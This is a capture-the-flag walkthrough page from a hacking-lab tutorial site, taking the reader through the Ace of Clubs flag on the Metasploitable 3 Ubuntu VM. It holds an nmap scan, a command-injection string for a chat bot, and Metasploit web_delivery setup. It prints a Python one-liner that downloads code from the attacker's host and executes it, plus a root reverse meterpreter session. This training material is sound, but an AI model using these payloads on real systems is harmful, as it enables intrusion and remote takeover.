<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="x-ua-compatible" content="ie=edge">
        <meta name="description" content="Metasploitable 3 Ubuntu - Ace of Clubs">

        <meta property="og:site_name" content="Hacker Lab Learn"/>
        <meta property="og:title" content="Ace of Clubs | Hacker Lab Learn"/>
        <meta property="og:description" content="Metasploitable 3 Ubuntu - Ace of Clubs"/>
        <meta property="og:url" content="https://my-jigsaw-docs.com/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"/>
        <meta property="og:image" content="/assets/img/logo.png"/>
        <meta property="og:type" content="website"/>

        <meta name="twitter:image:alt" content="Hacker Lab Learn">
        <meta name="twitter:card" content="summary_large_image">

        
        <title>Hacker Lab Learn | Ace of Clubs</title>

        <link rel="home" href="https://my-jigsaw-docs.com">
        <link rel="icon" href="/favicon.ico">

        
                    <!-- Insert analytics code here -->
        
        <link href="https://fonts.googleapis.com/css?family=Nunito+Sans:300,300i,400,400i,700,700i,800,800i" rel="stylesheet">
        <link rel="stylesheet" href="/assets/build/css/main.css?id=829c17c8b6b463371e17">

            </head>

    <body class="flex flex-col justify-between min-h-screen bg-grey-lightest text-grey-darkest leading-normal font-sans">
        <header class="flex items-center shadow bg-white border-b h-24 mb-8 py-4" role="banner">
            <div class="container flex items-center max-w-4xl mx-auto px-4 lg:px-8">
                <div class="flex items-center">
                    <a href="/" title="Hacker Lab Learn home" class="inline-flex items-center">
                        <img class="h-8 md:h-10 mr-3" src="/assets/img/logo.svg" alt="Hacker Lab Learn logo" />

                        <h1 class="text-lg md:text-2xl text-blue-darkest font-semibold hover:text-blue-dark my-0 pr-4">Hacker Lab Learn</h1>
                    </a>
                </div>

                <div class="flex flex-1 justify-end items-center text-right md:pl-10">
                                    </div>
            </div>

                <button class="flex justify-center items-center bg-blue border border-blue h-10 mr-4 px-5 rounded-full lg:hidden focus:outline-none"
    onclick="navMenu.toggle()"
>
    <svg id="js-nav-menu-show" xmlns="http://www.w3.org/2000/svg"
        class="fill-current text-white h-9 w-4" viewBox="0 0 32 32"
    >
        <path d="M4,10h24c1.104,0,2-0.896,2-2s-0.896-2-2-2H4C2.896,6,2,6.896,2,8S2.896,10,4,10z M28,14H4c-1.104,0-2,0.896-2,2  s0.896,2,2,2h24c1.104,0,2-0.896,2-2S29.104,14,28,14z M28,22H4c-1.104,0-2,0.896-2,2s0.896,2,2,2h24c1.104,0,2-0.896,2-2  S29.104,22,28,22z"/>
    </svg>

    <svg id="js-nav-menu-hide" xmlns="http://www.w3.org/2000/svg"
        class="hidden fill-current text-white h-9 w-4" viewBox="0 0 36 30"
    >
        <polygon points="32.8,4.4 28.6,0.2 18,10.8 7.4,0.2 3.2,4.4 13.8,15 3.2,25.6 7.4,29.8 18,19.2 28.6,29.8 32.8,25.6 22.2,15 "/>
    </svg>
</button>

        </header>

        <main role="main" class="w-full flex-auto">
            <section class="container max-w-4xl mx-auto px-6 md:px-8 py-4">
    <div class="flex flex-col lg:flex-row">
        <nav id="js-nav-menu" class="nav-menu hidden lg:block">
            <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/getting-started"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Getting Started
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">WebGoat 8 Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/general"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            General
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-introduction"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Introduction)
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/webgoat-8/injection-flaws-sql-injection-advanced"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Injection Flaws - SQL Injection (Advanced)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Damn Vulnerable Web App (DVWA) Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/brute-force"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Brute Force
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/command-injection"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Command Injection
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/damn-vulnerable-web-app/cross-site-request-forgery"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Cross Site Request Forgery (CSRF)
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Ubuntu Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs"
            class="lvl1  active font-semibold text-blue nav-menu__item hover:text-blue"
        >
            Ace of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/8-of-clubs"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            8 of Clubs
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-ubuntu/5-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            5 of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Metasploitable 3 Windows Walkthroughs</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/quickstart"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Quickstart
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/king-of-diamonds"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            King of Diamonds
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/ace-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Ace of Hearts
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/walkthroughs/metasploitable-3-windows/jack-of-hearts"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Jack of Hearts
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <p class="nav-menu__item text-grey-dark">Essentials</p>
    
            
        <ul class="list-reset my-0">
            <li class="list-reset pl-4">
            
        <a href="/essentials/scp"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            scp
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/ssh-keygen"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            ssh-keygen
        </a>
    
    </li>
            <li class="list-reset pl-4">
            
        <a href="/essentials/browser-developer-tools"
            class="lvl1   nav-menu__item hover:text-blue"
        >
            Browser Developer Tools
        </a>
    
    </li>
    </ul>
    </li>
            <li class="list-reset pl-4">
            
        <a href="/contribute"
            class="lvl0   nav-menu__item hover:text-blue"
        >
            Contribute
        </a>
    
    </li>
    </ul>
        </nav>

        <div class="w-full lg:w-3/5 break-words pb-16 lg:pl-4" v-pre>
            <h1>Ace of Clubs</h1>
<p>1. First, get logged into your Kali Linux instance. Checkout the <a href="/walkthroughs/metasploitable-3-ubuntu/quickstart/">Quickstart Guide</a> if you're not sure how to do this. </p>
<p>Next let's start off by running an <code>nmap</code> scan on our target from your Kali Linux instance: <code>nmap -p 1-65535 165.22.171.133</code>.
Here's a quick explanation of what this command does.</p>
<ul>
<li><code>nmap</code> - Start the <code>nmap</code> tool, a utility for network discovery and security auditing.</li>
<li><code>-p 1-65535</code> - Specify the ports to scan</li>
<li><code>165.22.171.133</code> - target IP address to scan (replace <code>165.22.171.133</code> with the IP address of your Metasploitable instance).</li>
</ul>
<p>And this is what the result will look like from your command line:</p>
<pre><code class="language-bash">hacker-lab@1e0f79a46253:~$ nmap -p 1-65535 165.22.171.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-23 22:24 UTC
Nmap scan report for 165.22.171.133
Host is up (0.00047s latency).
Not shown: 65514 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
1139/tcp open  cce3x
1180/tcp open  mc-client
1445/tcp open  proxima-lm
1617/tcp open  nimrod-agent
2322/tcp open  ofsd
3000/tcp open  ppp
3306/tcp open  mysql
3389/tcp open  ms-wbt-server
3500/tcp open  rtmp-port
4848/tcp open  appserv-http
5985/tcp open  wsman
6697/tcp open  ircs-u
8020/tcp open  intu-ec-svcdisc
8080/tcp open  http-proxy
8181/tcp open  intermapper
8282/tcp open  libelle
8383/tcp open  m2mservices
8484/tcp open  unknown
8585/tcp open  unknown
9200/tcp open  wap-wsp</code></pre>
<blockquote>
<p>Hint: <code>nmap</code> is an open source command line tool for network exploration and security auditing.
We're using it here to scan for open ports, and services running on those ports.
Checkout the <a href="https://nmap.org/">official documentation</a> for the <code>nmap</code> tool to learn more.</p>
</blockquote>
<p>2. Walk through each of the open ports discovered in the <code>nmap</code> scan until we discover a web server being served on port 1180 in your browser where we can see an open directory.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/1-port-80.PNG">
<p>3. Explore the links until you find a chat app.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/2-chat.PNG">
<p>3. Interact with the chat app, until you find a possible command injection vulnerability.
It looks like submitting the pattern <code>do you know x</code> will result in an answer that looks like the output from the <code>/etc/passwd</code> file.</p>
<pre><code class="language-bash"># hmmmm this answer makes it seem like it runs some kind of command on "flag" behind the scenes. 
# that's interesting let's explore this further.
(8:31 PM) wes: do you know flag
(8:31 PM) Papa Smurf: Ain't nobody knows this dude: flag

# looks like it searches the /etc/passwd file for whatever text in the pattern "do you know x"
(8:32 PM) wes: do you know root
(8:32 PM) Papa Smurf: Oh yeah I know this dude. He cool. He cool. Check this out I know the 
credential too:root:x:0:0:root:/root:/bin/bash 
(8:32 PM) Papa Smurf: zzzzzzzz.....</code></pre>
<p>4. Let's test our theory by entering: <code>do you know blah; ls</code> and it works! prints out the <code>/etc/passwd</code> file</p>
<pre><code class="language-bash">(8:32 PM) wes: do you know root; ls
(8:32 PM) Papa Smurf: Oh yeah I know this dude. He cool. He cool. Check this out I know the 
credential too:root:x:0:0:root:/root:/bin/bash 
bin boot dev etc home initrd.img lib lib64 lost+found media mnt node_modules opt proc root run sbin srv sys tmp usr var vmlinuz </code></pre>
<p>5. Let's use metasploit's <strong>web delivery auxiliary module</strong> to get a meterpreter shell on the victim machine.</p>
<blockquote>
<p>Hint: The web delivery auxiliary module creates a server on our Kali instance.
When the victim connects to it, the payload will be executed on the victim machine.
In our case we'll execute a meterpreter payload. See the <a href="https://www.offensive-security.com/metasploit-unleashed/web-delivery/">Offensive Security Documentation</a> to learn more about this module.</p>
</blockquote>
<p>Start up metasploit</p>
<pre><code class="language-bash">root@78ca8560af3d:~# msfconsole</code></pre>
<p>Use the web delivery module</p>
<pre><code class="language-bash">msf5 &gt; use exploit/multi/script/web_delivery</code></pre>
<p>Show the available options for this module</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python</code></pre>
<p>6. First we'll set the <code>SRVPORT</code> option to port <code>9990</code>
This tells the module to run the payload server on port <code>9990</code>.</p>
<p>We're using port <code>9990</code> because <a href="https://thehackerlab.co">thehackerlab.co</a> configures it's Kali Linux machines to keep ports <code>9990-9999</code> open and forwards them to the outside world.
You can use any open port that's available if you've setup Kali Linux manually.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; set SRVPORT 9990
SRVPORT =&gt; 9990</code></pre>
<p>7. Now let's set the <code>payload</code> option.
This tells the module what payload to deliver to the victim machine on execution.
In this case we're going to execute a meterpreter payload.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; set paylod python/meterpreter/reverse_tcp
paylod =&gt; python/meterpreter/reverse_tcp</code></pre>
<p>Let's show our options again to see if our payload has any new options.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; show options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  9990             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Python</code></pre>
<p>8. Let's set the <code>LHOST</code> option to the IP address of our Kali Linux instance.
This tells the module to have the victim connect back to the specified IP address.</p>
<p>Replace <code>104.248.222.201</code> with the IP address of your Kali instance.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; set LHOST 104.248.222.201
LHOST =&gt; 104.248.222.201</code></pre>
<p>Let's setup our payload to listen on port <code>9991</code> by specifying the <code>LPORT</code> option.
Note that <code>LPORT</code> specifies what port our payload (meterpreter shell) will listen on,
versus setting the <code>RPORT</code> specifies what port our delivery module uses to deliver the payload.</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; set LPORT 9991
LPORT =&gt; 9991</code></pre>
<p>9. Run exploit.
This will generate a command, that when executed on the victim machine, will connect back to our Kali Linux instance and execute the payload on itself.</p>
<pre><code class="language-bash">msf5 exploit
msf5 exploit(multi/script/web_delivery) &gt; [*] Local IP: http://172.18.0.2:9990/EUdcKJQ4h5JSE
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://104.248.222.201:9990/EUdcKJQ4h5JSE');exec(r.read());"</code></pre>
<p>10. Recall that we can inject any command into the chat app by submitting a message following the pattern &quot;do you know x; [command to inject]&quot;</p>
<p>Use a url encoder like <a href="https://www.urlencoder.org/">urlencoder.org</a> to encode our command, and then submit it to the chat app using the pattern we found.</p>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/5-exploit.PNG">
<p>11. This is what your metasploit console should look like if you've done everything right</p>
<pre><code class="language-bash">[*] 138.68.232.76    web_delivery - Delivering Payload
[*] Sending stage (53755 bytes) to 138.68.232.76
[*] Meterpreter session 1 opened (172.18.0.2:9991 -&gt; 138.68.232.76:47822) at 2019-05-16 22:29:50 +0000</code></pre>
<p>12. List available sessions</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; sessions -i

Active sessions
===============

  Id  Name  Type                      Information                    Connection
  --  ----  ----                      -----------                    ----------
  1         meterpreter python/linux  root @ metasploitable3-ub1404  172.18.0.2:9991 -&gt; 138.68.232.76:47822 (10.0.2.15)</code></pre>
<blockquote>
<p>Tip: Reference <a href="https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/">Metasploit Basics</a> to learn more about sessions.</p>
</blockquote>
<p>13. Use session 1</p>
<pre><code class="language-bash">msf5 exploit(multi/script/web_delivery) &gt; sessions -i 1
[*] Starting interaction with 1...

meterpreter &gt; whoami
[-] Unknown command: whoami.
meterpreter &gt; getuid
Server username: root</code></pre>
<p>14. Poke around we find the chat app.</p>
<pre><code class="language-bash">meterpreter &gt; pwd
/opt
meterpreter &gt; ls
Listing: /opt
=============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40644/rw-r--r--  4096  dir   2018-07-29 13:09:11 +0000  apache_continuum
40700/rwx------  4096  dir   2018-07-29 13:18:50 +0000  chatbot
40775/rwxrwxr-x  4096  dir   2018-07-29 13:07:22 +0000  chef
40770/rwxrwx---  4096  dir   2018-07-29 13:20:25 +0000  docker
40755/rwxr-xr-x  4096  dir   2018-07-29 13:14:56 +0000  proftpd
40755/rwxr-xr-x  4096  dir   2018-07-29 13:20:06 +0000  readme_app
40777/rwxrwxrwx  4096  dir   2019-05-02 20:23:11 +0000  sinatra
40100/--x------  4096  dir   2018-07-29 13:17:50 +0000  unrealircd

meterpreter &gt; search -f index.php
Found 1 result...
    ./chatbot/chat\index.php (3391 bytes)
</code></pre>
<p>15. Look in the chat app we see papa_smurf. Download the chat directory using the <code>download</code> command.</p>
<pre><code class="language-bash">meterpreter &gt; download -r chatbot

...a ton of files get downloaded

# exit meterpreter so we can work with the downloaded file
meterpreter &gt; exit</code></pre>
<p>16. Explore the directory further until we find a flag.</p>
<pre><code class="language-bash"># this papa_smurf directory looks interesting
root@78ca8560af3d:~/chatbot/papa_smurf# grep -Hrn 'flag' ./ | less

# base64 encoded file, a flag???
./chat_client.js:10:var flag = "iVBORw0KGgoAAAANSUhEUgAAA...</code></pre>
<p>17. Decode the image</p>
<ul>
<li><code>grep iVBORw0K</code> - filter results to the line that contains the string &quot;hearts&quot;</li>
<li><code>awk -F '"' '{print $2}'</code> - print the word of the line returned from grep. Which in this case is the base64 encoded string.</li>
<li><code>base64 -d &gt; ace_of_clubs.png</code> - decode the string into five_of_hearts.png</li>
</ul>
<pre><code class="language-bash">root@78ca8560af3d:~/chatbot/papa_smurf# cat chat_client.js | grep iVBORw0K | awk -F '"' '{print $2}' | base64 -d &gt; ace_of_clubs.png
root@78ca8560af3d:~/chatbot/papa_smurf# mv ace_of_clubs.png ~/</code></pre>
<p>18. Back on my local computer grab the image.
Replace <code>104.248.222.201</code> with the IP address of your Kali instance.</p>
<pre><code class="language-bash">wagena@81994499c1ad:~/projects$ scp -i ../hacker-lab hacker-lab@104.248.222.201:/home/hacker-lab/ace_of_clubs.png ./</code></pre>
<ol start="19">
<li>And the flag!</li>
</ol>
<img src="/assets/images/walkthroughs/metasploitable-3-ubuntu/ace-of-clubs/ace_of_clubs.png">        </div>
    </div>
</section>
        </main>

        <script src="/assets/build/js/main.js?id=ba3916078c37342007f3"></script>

        <script>
    const navMenu = {
        toggle() {
            const menu = document.getElementById('js-nav-menu');
            menu.classList.toggle('hidden');
            menu.classList.toggle('lg:block');
            document.getElementById('js-nav-menu-hide').classList.toggle('hidden');
            document.getElementById('js-nav-menu-show').classList.toggle('hidden');
        },
    }
</script>

        <footer class="bg-white text-center text-sm mt-12 py-4" role="contentinfo">
            <ul class="flex flex-col md:flex-row justify-center list-reset">
                <li class="md:mr-2">
                    &copy; <a href="https://thehackerlab.co" title="The Hacker Lab website">The Hacker Lab, LLC</a> 2019.
                </li>

                <li>
                    Built with <a href="http://jigsaw.tighten.co" title="Jigsaw by Tighten">Jigsaw</a>
                    and <a href="https://tailwindcss.com" title="Tailwind CSS, a utility-first CSS framework">Tailwind CSS</a>.
                </li>
            </ul>
        </footer>
    </body>
</html>
